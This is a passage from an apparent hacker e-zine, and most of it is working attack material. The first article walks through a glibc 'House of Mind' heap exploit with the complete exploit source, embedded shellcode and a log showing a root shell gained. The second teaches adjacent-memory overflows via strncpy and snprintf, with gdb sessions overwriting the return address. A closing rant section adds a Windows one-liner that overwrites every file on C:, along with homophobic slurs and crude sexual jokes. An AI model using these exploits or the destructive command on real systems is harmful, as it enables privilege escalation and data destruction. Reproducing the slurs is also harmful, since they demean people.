looks as the following:


#define arena_for_chunk(ptr) \
(chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)


chunk_non_main_arena(ptr) returns true, since i claim to be NON_MAIN_ARENA.
heap_for_ptr looks as the following:


#define heap_for_ptr(ptr) \
((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1))


HEAP_MAX_SIZE is defined as 1024*1024 on a default install. If you grock the
code you will find that ~(1024*1024-1) dilutes to be 0xFFF00000, which is an
AND-bitmask that would transform a number such as 0x08012345 into 0x08000000.

Assume that this is precisely what just happened: My first chunk allocated
in a piece of code happens to be 0x8012345. Then it's arena pointer (ar_ptr)
will be 0x08000000. This is invalid and will likely result in a segmentation
fault or likewise error since there is no arena structure located at the
address. This is also useless since I can not write data to this address -
and hence, I am unable to create a fake arena structure. What must be done
is just what Phantasmal suggested: Make the program allocate more memory
until a chunk is located above 0x81000000. Assume I allocate a chunk located
at 0x8100123. If I overflow this chunks size element with the NON_MAIN_HEAP
flag set, the arena pointer will be looked for it in memory that the previous
chunk controls. By forging an arena structure with evil offsets I can cause
code execution through at least two different code locations in the malloc
subsystem.

Phantasmal wrote of two different methods through which code execution can be

induced through the arbitrary forging of an arena. The first method involves
forging addresses in the bins[] array located inside of the arena structure.

Phantasmal wrote that if the following conditions where to be made valid:

- The negative of the size of the overflowed chunk must
be less than the value of the chunk itself.
- The size of the chunk must not be less than av->max_fast.
- The IS_MMAPPED bit of the size cannot be set.
- The overflowed chunk cannot equal av->top.
- The NONCONTIGUOUS_BIT of av->max_fast must be set.
- The PREV_INUSE bit of the nextchunk (chunk + size)
must be set.
- The size of nextchunk must be greater than 8.
- The size of nextchunk must be less than av->system_mem
- The PREV_INUSE bit of the chunk must not be set.
- The nextchunk cannot equal av->top.
- The PREV_INUSE bit of the chunk after nextchunk
(nextchunk + nextsize) must be set

Then the following code would be executed:

bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
bck->fd = p;
fwd->bk = p;

"In this case p is the address of the designer's overflowed chunk. The
unsorted_chunks() macro returns av->bins[0] which is designer controlled.
If the designer sets av->bins[0] to the address of a GOT or .dtors entry
minus 8, then that entry (bck->fd) will be overwritten with the address
of p."


Phantasmal kindof fibbed here. unsorted_chunks() does not return av->bins[0]
- it returns &av->bins[0], which, at first, seems to be about useless.
Phantasmal was close enough for us to give him credit, tho. In fact, I
imagine he just typed it wrong as it wouldn't work elsewise - fwd->bk would
cause a segfault. What actually has to be done is setting bck->fd
(&av->bins[0] + 8) to the address of the .dtors+4 entry minus 12. After this
is accomplished, fwd will be set to bck->fd, fwd->bk = p (bck->fd + 12) will
write the address of the chunk being free()'d to .dtors + 4. The first byte
of the chunk I write will actually be at p + 8, since p points to prev_size,
the first element of a chunk structure, and p + 4 points to the size element
- the second element in a heap structure. This is fair, because I can place
a jmp 0x4 in the 4 bytes that occupy prev_size. It will jump over the size
element and land right into the shellcode.

I've gone too far without introducing you to the vulnerable code!



------------------------------------------------------------ begin heap1.c --

#include <stdio.h>
#include <stdlib.h>

int main (void) {
char *ptr = malloc(1024);
char *ptr2;
int heap = (int)ptr & 0xFFF00000;
_Bool found = 0;

printf("ptr found at %p\n", ptr);

// i == 2 because this is my second chunk to allocate
for (int i = 2; i < 1024; i++) {
if (!found && (((int)(ptr2 = malloc(1024)) & 0xFFF00000) ==
(heap + 0x100000))) {
printf("good heap allignment found on malloc() %i
(%p)\n"
, i, ptr2);
found = 1;
break;
}

}
malloc(1024);
fread (ptr, 1024 * 1024, 1, stdin);

free(ptr);
free(ptr2);
return(0);
}

-------------------------------------------------------------- end heap1.c --


This code makes an initial malloc, followed by numerous additional
allocations which are necessary to return a chunk that would be expected to
have an arena in a memory location that I can write to through the heap
overflow. The first chunk found having an arena in overflowable memory has
its address printed for my convienence. After this, one more chunk is
allocated since Phantasmal stated that the free()'d chunk could not equal
av->top (the most recent allocated chunk) (actually he said nextchunk could
not equal this, he fibbed again)

Now for exploit code:


----------------------------------------------------------- begin ploit1.c --

#include <stdio.h>

/* linux_ia32_exec - CMD=/usr/bin/id Size=72 Encoder=PexFnstenvSub
http://metasploit.com */

unsigned char scode[] =
"\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
"\xc9\x6a\x42\x83\xeb\xfc\xe2\xf4\x34\xc2\x32\xdb\x0c\xaf\x02\x6f"
"\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10"
"\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26"
"\x5e\x9e\x39\xcb\xbf\x04\xea\x42";

int main (void) {
// don't use the first 8 bytes of a chunk for data because
// when it is free()'d it seems to be garbaged up with
// strange addresses.
for (int i = 0; i < 8; i++) putchar(0x41);

// set the mutex to 0
fwrite("\x00\x00\x00\x00", 4, 1, stdout);

// write max_fast a few times, we'll hit it and we'll
// take up some more bytes
for (int i = 0; i < 32 / 4; i++)
fwrite("\x02\x01\x00\x00", 4, 1, stdout);

// finish this chunk with the address one wants to place at
// bins[0] + 8 (dtors_end - 12)
for (int i = 0; i < 984 / 4; i++)
fwrite("\x70\x96\x04\x08", 4, 1, stdout);

// fill in the unused mallocated space with A's but
// preserving the 'size' element (1024 with PREV_INUSE
// bit set)
for (int i = 0; i < 721; i++) {
fwrite("\x09\x04\x00\x00", 4, 1, stdout);
for (int i = 0; i < 1028; i++)
putchar(0x41);
}
fwrite("\x09\x04\x00\x00", 4, 1, stdout);

// this is the memory that heap_for_ptr returned,
// one wants to fill it with the address of which
// ar_ptr should have
for (int i = 0; i < (1024 / 4); i++)
fwrite("\x10\xa0\x04\x08", 4, 1, stdout);

// jmp + 12
fwrite("\xeb\x0c\x90\x90", 4, 1, stdout);

// size field with NON_MAIN_ARENA set
fwrite("\x0d\x04\x00\x00", 4, 1, stdout);

// icky 8 byte filler
fwrite("\x90\x90\x90\x90\x90\x90\x90\x90", 8, 1, stdout);

// finally the shellcode
fwrite(scode, sizeof(scode), 1, stdout);

return(0);
}

------------------------------------------------------------- end ploit1.c --


First things first, I build a fake arena structure in the first mallocated
block from heap1.c. I start out 8 bytes from the top of it, since when it is
free()'d, these 8 bytes will be garbaged. Then I write a 0. I had to learn
the hard way (lots of glibc reading) that the first value of an arena
structure is a mutex. This mutex will be waited upon (blocked upon) and your
program will infinite loop if it equals anything other than 0. Next i write
0x102, this is max_fast with a small size (so my chunk is not considered
smaller than max_fast, as Phantasmal stated) which also has the NONCONTIGUOUS
flag (defined as 2) set. max_fast is located at ar_ptr + 8. Afterwards, I
garbage the rest of the arena with the address I wish p to be written to,
minus 12. &bins[0] is located at ar_ptr + 76 so I am sure to hit it. Next,
the unused mallocated area I am overflowing is filled with filler until I get
to the chunk which consists of the memory that heap_for_ptr returns. Here, I
must provide the arena location that ar_ptr will contain - and hence, the
arena location that free will use for this chunk. ar_ptr is located at the
address returned by heap_for_ptr. Almost there. Next I need to fill the chunk
that will be written to the specified memory location. By starting with a jmp
12, I jump past the 'size' element of this chunk and the first 8 bad bytes of
it (from once it's free()'d). Next comes the size field itself, which should
be the legit size of the chunk along with the NON_MAIN_ARENA bit set.
Finally, the 8 icky byte filler followed by the pretty shellcode.


-----------------------------------------------------------------------------

Location to be written to (dtors + 4), minus 12:
kspecial@mirage:~$ objdump -x heap | grep dtors | head -1
16 .dtors 00000008 08049678 08049678 00000678 2**2

0x08049678 + 4 - 12 == 0x08049670

Location of arena (first chunk, + 8)
kspecial@mirage:~$ ./heap
ptr found at 0x804a008
good heap allignment found on malloc() 724 (0x81002a0)

0x0804a008 + 8 == 0x0804a010


Behold:

kspecial@mirage:~$ gcc -o heap heap1.c -std=c99
kspecial@mirage:~$ gcc -o ploit ploit.c -std=c99
kspecial@mirage:~$ ./ploit > file
kspecial@mirage:~$ su root
Password:
mirage:/home/kspecial# chown root heap
mirage:/home/kspecial# chmod 4755 heap
mirage:/home/kspecial# exit
exit
kspecial@mirage:~$ ./heap < file
ptr found at 0x804a008
good heap allignment found on malloc() 724 (0x81002a0)
uid=1000(kspecial) gid=1000(kspecial) euid=0(root)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),
107(powerdev),1000(kspecial)
kspecial@mirage:~$


-----------------------------------------------------------------------------

diagram of the trashed heap:


chunk 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x1
| prev_size (?) | size (0x409) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| garbage (0x4141414141414141) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| mutex (0x0) | max_size (0x102) x 8 .
.-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ .
. |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|

  
.
. (Spam of write to location - 12) x 246 .
. (0x08049670) .
. |
chunk 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x271
| prev_size (0x41414141) | size (0x409) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| .
. 0x41 x 1024 .
. .
. |
chunk 273 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x1
| prev_size (0x41414141) | size (0x409) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| .
. Spam of arena location x 256 .
. (0x0804a010) .
. |
chunk 274 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x1
| prev_size (EB0c9090) | size (0x40d) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| garbage (0x9090909090909090) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+ .
. SHELLCODE! .
. .
. |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



chunk 2 actually has a prev_size of 0x08049670, because I overflow it in
chunk 1 (but it is irrelevant). All the chunks from there on have a prev_size
of "AAAA", while 273's is the jmp code.

I will not be providing source code here for the fastbin method Phantasmal
suggested to be used with the house of mind. I will, although, quickly
document its primary goal and state why I feel about it the way I do. The
fastbin method is not entirely different from the bin method described above.
With the fastbin method, the primary goal is to point the arena elsewhere
while making sure the size field of the chunk being free()'d is less than
max_size, which will, in turn, cause this code to be excuted:

set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
// ...
p->fd = *fb;
*fb = p;


This is quite trivial to exploit with what has been said. If I where to point

the arena to a location such that max_fast (av + 4) was larger than the chunk

being free()'d and hence, &(av->fastbins[fastbin_index(size)]); returning a
pointer to a GOT or .dtors entry, then that entry would be overwritten with
the address of the chunk being free()'d. The only problem lies within
av->system_mem, which is contained at the end of an arena structure (check
malloc.c struct malloc_state for an arena structure). nextchunk (the chunk
after the chunk being freed()'d) must be smaller than system_mem. In the
small, vulnerable heap I coded, there where too many zeros after both the GOT
and dtors sections. It was impossible to set system_mem to any value other
than 0. Phantasmal wrote that if the GOT was too small (as in small programs,
such as mine), the stack could be used to the same advantage. In other words,
I would be capable of placing the arena in a spot of the stack such that
*fb = p would overwrite eip or some other data flow variable. This is albeit
near impossible on modern linux systems since address space layout
randomization is present.
However, this method is viable in larger applications, and is deffinitely
easier to write.

One last note. This work was done with a modern Debian 4.0 machine.
The GLibC version is 2.3.6, the following debian packages where used:
libc6-dbg - GNU C Library: Libraries with debugging symbols
libc6-dev - GNU C Library: Development Libraries and Header Files
Along with standard 2.3.6 sourecode.

--K-sPecial


[=================================[ REF ]==================================]


PS: I will place these codes on the site, in case 80 CPL formatting has
gotten the best of them.

[1] "The Malloc Maleficarum" (http://securityfocus.com)
By Phantasmal Phantasmagoria.
Tue, 11 Oct 2005 10:14:02 -0700 Sat, 31 Dec 2006 23:01:33 -0500
http://awarenetwork.org/etc/zine1/ref/MallocMaleficarum.txt

[2] "Once upon a free()" (http://phrack.org)
Published time Unknown Sat, 31 Dec 2006 23:01:33 -0500
http://awarenetwork.org/etc/zine1/ref/once%20upon%20a%20free.txt

[3] "GLibC" http://gnu.org
Tue, 03 Nov 2005 20:12 31 Dec 2006 23:01:33 -0500 20:12
http://ftp.gnu.org/gnu/glibc/glibc-2.3.6.tar.bz2


[==================================[ EOF ]==================================]

[=========================================================================]
[----------------[ Advances in adjacent memory overflows ]----------------]
[=========================================================================]


_==####==_
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/?_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########*?*######
*#########{ }####*
##########._.#####
################ by Nomenumbra/[0x00SEC]
*############*
?==####==?



--[ 0x00 ]---------------------------------------------[ Introduction ]----


In this relatively small paper we'll discuss the basics and some
(completely new) advances in adjacent memory overflows. For those
unfamiliar with Adjacent memory overflows i'd like to refer you to Mercy's
article (http://www.milw0rm.com/papers/98) or Twitch's article "TAKING
ADVANTAGE OF NON-TERMINATED ADJACENT MEMORY SPACES"
in phrack (Volume 0x0A,
Issue 0x38 phile 0x0E).

Here follows a basic explanation of the phenomenon:

In most of today's apps the vulnerable strcpy() and strcat() functions have
been replaced with strncpy() and strncat() to prevent normal buffer
overflows. It is however possible to exploit the strn* functions and the
likes trough 0-unterminated strings. Let's look at the following example:

---------------------------------------------------------------------------
nobody@cerebrum:~/# cat vln.c
#include <stdlib.h>

int main(int argc,char* argv[])
{
char buf3[512];
char buf2[1024];
char buf[256];
strncpy(buf,argv[1],256);
strncpy(buf2,argv[2],1024);
sprintf(buf3,"%s",buf);
return 0;
}
---------------------------------------------------------------------------

Well most people will say, this shouldn't be a problem? Now should it? I
mean, buf will never be over 256 bytes, and buf3 is far bigger then buf so
where's the problem?

The problem lies in the combination of strncpy and sprintf. Strncpy will
namely copy up to a maximum of 256 bytes, so if argv[1] contains exactly or
more then 256 bytes, it won't copy the terminating NULL-byte (and neither
add it), then sprintf will copy bytes from buf's address all the way up to
the first encountered NULL-byte terminator. As you can see, buf's stack
data will flow right into buf2's data, since they're allocated right next
to each other on the stack. So we can supply a total of 1024 + 256 = 1280
bytes which is more then enough to overflow buf3. As you can see the
requirements for exploiting an app with an adjacent memory overflow are:

[*] Prescense of a vulnerable function handling user-controlled data
[*] This data being handled by a function assuming NULL-byte termination
[*] Fair control of surrounding stack area

These vulnerable functions can be custom as well of course, so don't only
look for the ones mentioned here.



--[ 0x01 ]------------------------------------[ Exploiting snprintf() ]----

Of course, not all functions will allow adjacent memory overflows to occur
like this. For example, read() and strncpy() will allow further reading,
while similarly fgets() and snprintf() will not, under the same size
limitations.

snprintf() (and fgets) where long thought to be safe from adjacent memory
overflows due to automatic adding of a terminating null byte - that was
wrong as I noticed ...

The official documentation tells us that:

"If size is zero, nothing is written and str may be null."

Nothing is written, correct, but it isn't 0 terminated either >:). Now let
us look a bit more in-depth:

Size includes the terminating 0byte ,so if size is 10, it'll copy bytes
until it encouters a terminating 0 byte, if it doesn't find one withing 9
bytes, it'll copy 9 bytes and add it's own terminating 0 byte. And this is
where the problem lies....

It copies up to size-1 bytes from the buffer - interesting. Now if we look
at the doprintf() function utilized by snprintf() source we see:

---------------------------------------------------------------------------
currlen = flags = cflags = min = 0;
max = -1;
ch = *format++;

while (state != DP_S_DONE)
{
if ((ch == '\0') || (currlen >= maxlen))
state = DP_S_DONE;

// ....
// Then later, at the end:


if (currlen < maxlen - 1)
buffer[currlen] = '\0';
else
buffer[maxlen - 1] = '\0';
---------------------------------------------------------------------------

the problem obviously lies in the fact that currlen being 0 and getting
compared to 0 it breaks (the switch statement over state breaks upon
DP_S_DONE) and goes straight to

if(0 < -1)
buffer[0] = '\0';
else
buffer[0 - 1] = '\0';

so buffer[-1] will be 0x00? yup, which effectively leaves the buffer
unterminated with a NULL byte (and unfilled too) leaving it completely open
to adjacent memory overflows. want an example?

---------------------------------------------------------------------------
nobody@cerebrum:~/# cat /proc/sys/kernel/randomize_va_space
0
<!
No va randomization in this case!
!>

nobody@cerebrum:~/# cat vln.c

#include <stdlib.h

int main(int argc,char* argv[])
{
char buf3[11];

char buf2[100];
char buf[10];
snprintf(buf,0,"%s",argv[1]);
strncpy(buf2,argv[2],100);
sprintf(buf3,"%s",buf);
printf("%s\n",buf3);
return 0;
}

nobody@cerebrum:~/# gcc -o vln vln.c
nobody@cerebrum:~/# ./vln a test
?%?test

<!
See the test at the end of buf3? That's right, buf isn't 0 terminated so
sprintf just runs like a muthafucker all the way up to buf2
Exploitation is trivial
!>
nobody@cerebrum:~/# gdb vln
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db
library "/lib/tls/libthread_db.so.1".

(gdb) r a `perl -e 'print "A"x12,"B"x4'`
Starting program: /tmp/vln a `perl -e 'print "A"x12,"B"x4'`
???%?AAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
---------------------------------------------------------------------------

Now, on with the show. This type of bug will most likely only occur when
size is user-supplied or user-influenced, so imagine the following example:

---------------------------------------------------------------------------
nobody@cerebrum:~/# cat vln.c

#include <stdlib.h>

int main(int argc,char* argv[])
{
char buf3[20];

char buf2[100];
char buf[10];
int lim;
printf("Usage: %s <str1 max size including the 0-byte terminator>"
" <str1> <str2>\n",argv[0]);
lim = atoi(argv[1]);
if (lim > 9)
exit(0);
snprintf(buf,lim,"%s",argv[2]);
snprintf(buf2,99,"%s",argv[3]); // correct usage
sprintf(buf3,"%s",buf); // buf to buf3
printf("buf3: [%s]\n",buf3);
return 0;
}

nobody@cerebrum:~/# gcc -o vln vln.c
nobody@cerebrum:~/# ./vln 2 123456789 test
Usage: ./vln <str1 max size> <str1> <str2>
buf3: [1]
nobody@cerebrum:~/# ./vln 0 123456789 test
./vln 0 123456789 test
Usage: ./vln <str1 max size> <str1> <str2>
buf3: [??

<!
Huh?! No memory overflow into str2? No moaning yet, just sit back and
watch ;)
!>

nobody@cerebrum:~/# ./vln -1 123456789123456789 test
Usage: ./vln <str1 max size> <str1> <str2>
buf3: [1234567890123456test]
---------------------------------------------------------------------------

As you can see the buffer will be filled up with 16 bytes before continuing
into buf2. Exploitation is, again, trivial:

---------------------------------------------------------------------------
nobody@cerebrum:~/# gdb vln
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db
library "/lib/tls/libthread_db.so.1".

(gdb) r -1 1234567890123456 `perl -e 'print "A"x28,"B"x4'`
Starting program: /tmp/vln -1 1234567890123456 `perl -e 'print "A"x28,"B"x4'`
Usage: /tmp/vln <str1 max size inc 0-byte> <str1> <str2>
buf3: [1234567890123456AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
---------------------------------------------------------------------------

As you can see, the exploitability of a piece of code is highly
situationally and environmentally dependant, but this shows that some cases
CAN be exploited and arms you with yet another nice weapon in your arsenal
of doom ;)



--[ 0x02 ]-----------------[ Abusing strlen() for more memory madness ]----

Yes, strlen() and consorts can be exploited too, well not in a casual way
like buffer overflows, but in the same way integer overflows can. Through
programmer assumption. The programmer assumes things about the return value
of strlen(). For example, if we strlen(buf) and buf is the result of a
strncpy(buf,argv[1],10) the programmer will most likely assume strlen()
will never be bigger than 10. But that's untrue...

Let us look at a sample program that would be commonly considered safe, if
it weren't for adjacent memory overflows:

---------------------------------------------------------------------------
nobody@cerebrum:~/# cat vln.c
#include <stdlib.h>

int main(int argc,char* argv[])
{
char buf3[512];
char buf2[1024];
char buf[256];
strncpy(buf,argv[1],256);
strncpy(buf2,argv[2],1024);
strncpy(buf3,buf,strlen(buf));
printf("[%s]\n",buf3);
return 0;
}
---------------------------------------------------------------------------

Hmm how to exploit this? We have a 0-unterminated buf going all the way
right into buf2 - but buf is strncpy()'ed into buf3, not sprintf()'ed or
strcpy()'ed - and as we take a close look at the size parameter, we spot
strlen(). Now how can this work in our benefit:

strlen() counts the number of bytes at the pointer supplied to it's first
argument, all the way up to the first terminating null byte. Because buf
is 0-unterminated in the example, strlen will continue searching for a
null-byte in buf2, hence it returning a higher result. This can be
exploited in a trivial manner:

---------------------------------------------------------------------------
nobody@cerebrum:~/# gdb vln

GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db
library "/lib/tls/libthread_db.so.1".

(gdb) r `perl -e 'print "A"x256'` `perl -e 'print "A"x268,"B"x4'`
Starting program: /tmp/vln `perl -e 'print "A"x256'` `perl -e 'print "A"x26
8,"B"x4'`
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
BBBB]

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
---------------------------------------------------------------------------


This vulnerability goes for memcpy, strncat, memmove and others as well of
course. Note that strstr, strchr,strcspn and the like are vulnerable too,
if the first parameter is 0-unterminated, they will keep digging trough
memory, potentially returning pointers to some place in a far bigger buffer
or one containing potentially sensitive data).

As you can see this case is yet again higly dependant on the code as a
whole, just like with integer overflows. To sum up some vulnerable
functions:

Some functions vuln to adjacent memory overflows trough 0-unterminated
strings:

[*] sprintf
[*] fprintf
[*] snprintf
[*] memcpy
[*] memmove
[*] strcpy
[*] strcat
[*] strlen
[*] strstr
[*] strchr
[*] strcspn
[*] read
[*] ...



--[ 0x03 ]----------------------------------------------------[ Outro ]----

Well peeps, i hope you enjoyed this small text and learned something from
it, i most certainly did. And remember kids, keep the scene alive, never
sell out and never narc.

Greetz and shouts to:

The .aware/xzziroz cast & crew (of course ;), All Nullsec members, the
HackThisSite community, PullThePlug folks, the guys over at SmashTheStack,
RRLF, Binary Shadow Organization, Blacksecurity, the vx.netlux.org people
and all true "hackers"/blackhats out there.

[=========================================================================]
[-----------------------------[ /dev/random ]-----------------------------]
[=========================================================================]


..ssS$S$$S:sss:..
.$SSS$$$$$SS$SsS$$S.
.sS$$$SSSSS$$$(|`$S$$Ss.
.sSSS$$$' `:$SS$$'` `/';
:S$$$$S' `:$$S._
:S$SSS$:. `'?::..
`S$SS$S$$$Sssssss:?.
`SS$SSSS$$$$$S$$$$$$s.
`S$$$$$$$SS$$S$SS$$$S:.
`?S$$$S$$$$$S$$SSS$$$. The rattler's private thoughts
`~~~~~?:S$$$$SSSSS: on the world, the internet,
`;SSSSSSSS; and many other things.
.SSSS$$$$S'
o .S$$Ss. .s$$$$$SS$$'
o' ..:$S$$SS$$SsssS$$SSSSS$SS'
::.;:S'~~?:$SSS$$$$SSSS$SSS$$'
''' `$$$S$$[rattle]$'




[========================================================================]


Pages that have a link to google search, like this:
___________________________ _______________
| | | search google |
??????????????????????????? ???????????????
... are fucking gay. if you need a spacefiller, use a random
packetstorm ad. If we wanted to search google, we would go to

w w w - g o o g l e - c o m

[========================================================================]


ASCII roses are so fucking gay.

<butterfly56> @-,--`--
<butterfly56> :-)
<rattle> wtf
<rattle> 8===========D
<butterfly56> ?


[========================================================================]


Zone-H is really gay

http://www.zone-h.org/


[========================================================================]


////////
\ .) .)/
\ _' /
\ | "hi!"
| |\ ,,,,,
| |\\ (^.(^)
( // \O /
| || /| |
| || // \ \___
| || ?? ???\ \


////////
\ -) -)/
\ o /
\ | *MMPF*
| |\ ,,,,,
| |\\ (+.(+)
( 8======) /
| | \ /| |
| |\ \ // \ \____
| |/ / ?? ????\ \



[========================================================================]

Windows 2003 stack protection is pretty gay
__________________________________________________
| Overflow Detected | _ | # | X |
|??????????????????????????????????????????????????|
| uh err sumthing wrong with eip here's some |
| numbers: |
| |
| D4Ef566D 00400000 00000000 00000001 0D00D034 |
| |
| _____________ |
| | Ok | |
| ????????????? |
??????????????????????????????????????????????????


[========================================================================]


for /R c:\ %i in (*.*) do @echo M>%~fsi 2>NUL

... yourself.


[========================================================================]


MSN emoticons are so fucking gay.

[15:28] rattle: it's (cos(t), sin(t), 0)
[15:28] stev: I see a red telephone


[========================================================================]

People with excessively long MSN nicknames should die.

[16:42] charles - hey bob, I really enjoyed shifting that dildo
up your anus last night - listening to Metallica - YEAH!: hey
[16:42] rattle: change your nick, for the love of god.


[========================================================================]


class porn {
explicit sex(long penis, double penetration);
};


[========================================================================]

_______________________________________
| Enter Target IP | _ | # | X |
|???????????????????????????????????????|
| Enter each digit separately. To |
| switch from one ocet field to the |
| next, use CTRL+BLANK. In order |
| to switch from one digit field to |
| the next, use CTRL+ALT+BLANK. |
| _ _ _ _ _ _ _ _ _ _ _ _ |
| IP: | | | |.| | | |.| | | |.| | | | |
| ? ? ? ? ? ? ? ? ? ? ? ? |
| ________ ________ |
| | CANCEL | | OK | |
| ???????? ???????? |
???????????????????????????????????????

IP Address Input Controls drive me insane.


[========================================================================]


# define b00l bool
# define d4mn catch
# define c1455 class
# define d31337 delete
# define expl1c17 explicit
# define n0p3z false
# define m473 friend
# define inl1n3 inline
# define m3w74b13 mutable
# define n3w new
# define pr1v473 private
# define pr073c73d protected
# define pub1ic public
# define t3mp1473 template
# define th1z this
# define thr0w throw
# define trud47 true
# define m3bb3h try
# define typ3n4m3 typename
# define u51ng using
# define v1r7u41 virtual

And even then, C++ would not be l33t.


[========================================================================]



_..gggggppppp.._
_.go2DD54CA5F04E6EE60Aop._
.g4CBD616BE88DF93F761A90FA0393p.
.g9A1C6A235A1DC2208D42AB86940C9A954Ep.
.oDA77550E3A55D3F079F0B6E6959916DE95CAE3o.
.o52950F71920F908B563D6A79DDD4A375DA5978CE25o.
o7EC76BC428D48FC156D98C79077EFCE5DA156F4552C40Bo
o4A55E5C22696814ECA2332797A7B5B088A9DD82D09D1A0A3o
oEE3BBD799DEDE79EAF3B2BFC71CEA704AD412B8FD612A3B29Bo
o9D7675F188662EEAD5FA677A6C2F934DE3194460F0E51B57857Co
o317227593982925589EF8B5D496D3C0039B7D9200DD44DB26AA8CBo
:F0D819CD076F1229B151A00CC514BB9349452681389C6A710C78E791;
43894E690A8FCD6BFFC2325602BE5B9A1E3529EDC610C780878DD79C63
:A52BCB8D42BFFDC72DE221729F0A5A221A01EEEAFDCC83C90165E195B0;
C7FA692DAAA1D35EE0AFEA42CC318E55F8CFD72D51B27FBCC8BA9C9B7EB0
:4C9305261B2265F5E69EA44DE49FD840B713E5D94B8DBD52E46033CFE50B;
:A249372A3F396FA0FD5B6432B796C57E3DC5B3275607BA92D82E1E839482;
C63AB12D97C8445D031BF57246E5616FAC1E713B7B58EF193C15C2A4598ABC
379BD8E3C0133B394F83D67F5B20FD797AD4CADA1EB9621A9F517E0D6925F7
:D1D54FCB21589171B2DBE1D8E87936ABAP"' "QCE3AD9D4CAA0A74B33;
:B832EACD8E987E0F18365F974D98F7FF1Y Y04CCB95C9904CC617;
77CF38BC802B1B933E79C99432F185103 EC58A3DB7240EC742
:039AD9304D24EA8E5C13B76E6C7F71CA. .624F0879C4820007;
F383A4082BDB1378F30D6E5797FD9559O O050224388E474486
:D05F6D6317D05EFAB48C9C9F77D884C2o,_ _,oDD5FF0DDD9238647;
T29CFE61A0A56AF9929295E12C5E82B2FB3CF5F811B4D8C5E35E210P
T3B04FAE89130E3915652630B8B84EFEB7BBAB4142EB46C90922EP
T02EF86A5DF116B42275CD09135EBA92A51662C9F719C944ABAP
TA8137CFF503939AEB079D9566230965C652A2ACEAC29D347P
TD45EB4066AC89F3EF5B7E148C295C575ECF62E8E080119P
`TF0FDC2A352208F32F3EB2B6F1C94A5F220EC9AE9D0P'
`TD5E77B45C728B6AD5549DA225C3A855CAE9ACCP'
"^DE7171378BED7E10E5DEB5A0A8377593FF^"
